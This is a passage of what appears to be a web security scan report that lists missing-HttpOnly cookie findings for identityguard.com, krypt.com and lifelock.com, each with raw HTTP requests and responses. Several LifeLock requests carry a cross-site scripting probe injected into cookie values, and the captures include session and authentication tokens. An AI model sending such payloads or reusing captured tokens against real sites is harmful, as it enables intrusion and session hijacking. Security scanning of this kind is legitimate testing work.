<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

18.392. https://secure.identityguard.com/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /Logoff

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/EnrollmentStep1?storeId=10051&MID=44929
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002779999=100000002779999%2cJUzxOb61NxaLz%2bgbZ1Ro3ggcxR4%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002779999=100000002779999%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYV5lF81xxnGdIw%2bl67KlnwpiaV4dm5kxr6RupgpYiYzej4qMfr2800fXVLG6wog7P5%0aK21Gyauwu09mpmZhZ4vP36C00p317MJMJzNFxLjHfFcZX48t8T07DRFWuTmeY%2bqHjX9%2bVZQs5rb%2f%0aTds7a7PW; cmTPSet=Y; 90226925_clogin=l=1303664423&v=3&e=1303665347307; cmRS=&t1=1303664423903&t2=1303664427096&t3=1303664447306&lti=1303664447305&ln=Map&hr=%23&fti=&fn=contactInfoForm%3A0%3B&ac=&fd=&uer=&fu=&pi=Enrollment%20Step%201&ho=data.coremetrics.com/cm%3F&ci=90226925&ul=https%3A//secure.identityguard.com/EnrollmentStep1%3FstoreId%3D10051%26MID%3D44929&rf=http%3A//www.identityguard.com/&cjen=1

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 17:16:09 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:INTXReportDisplay
Set-Cookie: WC_AUTHENTICATION_100000002779999=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779999=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPm3h%2bUPrQaInKO%0aI5%2fwRlx%2ba4dEb3pz9ivhZXzn2hnp%2fesOoSY5sMac8iFFBOVsfb8fZGV6VEVdPKs%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17541295%3atrue%3afalse%3a0%3a1la40HRl5AsYnB6LdDH1p7zJDyc%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


18.393. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

18.394. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


18.395. https://secure.krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:19 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

18.396. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/?customize HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 16:39:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:39:24 GMT; path=/; domain=.krypt.com
Location: /order/customize.html?index=2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 20084


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...

18.397. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...

18.398. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...

18.399. https://secure.lifelock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 16:56:11 GMT
Location: https://secure.lifelock.com/portal/login/
Content-Length: 0
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 17:11:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TS376161=b7f12e4e7a8f676e36aef6838b8fa816945c3cbfd48195b84db4562b; Path=/


18.400. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

18.401. https://secure.lifelock.com/enrollment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment/ HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:07 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:11:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=2fac6d3ef891d6bc8f6be2ddc70c080c945c3cbfd48195b84db45627; Path=/
Vary: Accept-Encoding
Content-Length: 25812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
